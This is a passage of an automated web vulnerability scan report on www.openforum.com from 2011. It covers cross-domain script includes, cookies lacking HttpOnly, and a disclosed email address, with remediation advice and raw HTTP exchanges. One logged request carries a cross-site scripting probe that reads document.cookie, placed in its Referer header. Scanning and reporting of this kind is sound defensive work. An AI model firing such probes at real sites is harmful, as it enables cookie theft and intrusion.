<a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a>
...[SNIP]...
<li>
<a id="footer_privacy_statement" title="" href="https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement&inav=footer_privacy_statement">Privacy Statement</a>
...[SNIP]...
<li class="iNavLast">
<a id="footer_card_agreements" title="" href="https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do?vgnextoid=bbf185df62df5210VgnVCM100000defaad94RCRD&source=footer_card_agreements&inav=footer_card_agreements">Card Agreements</a>
...[SNIP]...
</div>
<script src="https://secure.americanexpress.com/NextGenNavigation/js/commonFunctions.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
   src="https://amexopendev.122.2O7.net/b/ss/amexopendev/1/H.17--NS/0"
   height="1" width="1" border="0" alt="" title="Web Analytics"/>
</a></noscript><!--/DO NOT REMOVE/-->
   
   
<script language="JavaScript" src="https://xedge.aperture.displaymarketplace.com/displayscript.js?liveconclientID=4045860080196&PageID=11&EventType=View&rand=460C8E5"></script>
<noscript><img src="https://secure.aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=4045860080196&PageID=11&EventType=view&rand=460C8E5" height="1" width="1" border="0" /></noscript>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.openforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BIGipServerAmex=2852890816.20480.0000; path=/
Content-Length: 102165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
</div>
<script src="https://secure.americanexpress.com/NextGenNavigation/js/commonFunctions.js" type="text/javascript"></script>
...[SNIP]...
<!--/DO NOT REMOVE/-->
   
   
<script language="JavaScript" src="https://xedge.aperture.displaymarketplace.com/displayscript.js?liveconclientID=4045860080196&PageID=11&EventType=View&rand=41937CE"></script>
...[SNIP]...

4.2. https://www.openforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BIGipServerAmex=2852890816.20480.0000; path=/
Content-Length: 101831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
</div>
<script src="https://secure.americanexpress.com/NextGenNavigation/js/commonFunctions.js" type="text/javascript"></script>
...[SNIP]...
<!--/DO NOT REMOVE/-->
   
   
<script language="JavaScript" src="https://xedge.aperture.displaymarketplace.com/displayscript.js?liveconclientID=4045860080196&PageID=11&EventType=View&rand=D63334E"></script>
...[SNIP]...

4.3. https://www.openforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/
Content-Length: 102267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
</div>
<script src="https://secure.americanexpress.com/NextGenNavigation/js/commonFunctions.js" type="text/javascript"></script>
...[SNIP]...
<!--/DO NOT REMOVE/-->
   
   
<script language="JavaScript" src="https://xedge.aperture.displaymarketplace.com/displayscript.js?liveconclientID=4045860080196&PageID=11&EventType=View&rand=460C8E5"></script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.openforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BIGipServerAmex=2852890816.20480.0000; path=/
Content-Length: 102165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

5.2. https://www.openforum.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/
Content-Length: 102267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

6. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /javascripts/omniture/s_code.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /javascripts/omniture/s_code.js HTTP/1.1
Host: www.openforum.com
Proxy-Connection: keep-alive
Referer: http://www.openforum.com/?54350'-alert(document.cookie)-'b64566be317=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; BIGipServerAmex=2819336384.20480.0000

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 26 Jan 2011 16:03:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, must-revalidate, proxy-revalidate, max-age=61081
Expires: Sat, 05 Feb 2011 11:58:22 GMT
Date: Fri, 04 Feb 2011 19:00:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 19502

/* SiteCatalyst code version: H.17.


Copyright 1997-2008 Omniture, Inc. More info available at


http://www.omniture.com */


/************************ REPORT SUITE DECLARATION *******
...[SNIP]...
q+(qs?qs:s."


+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"


+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:03:04 CST 2011.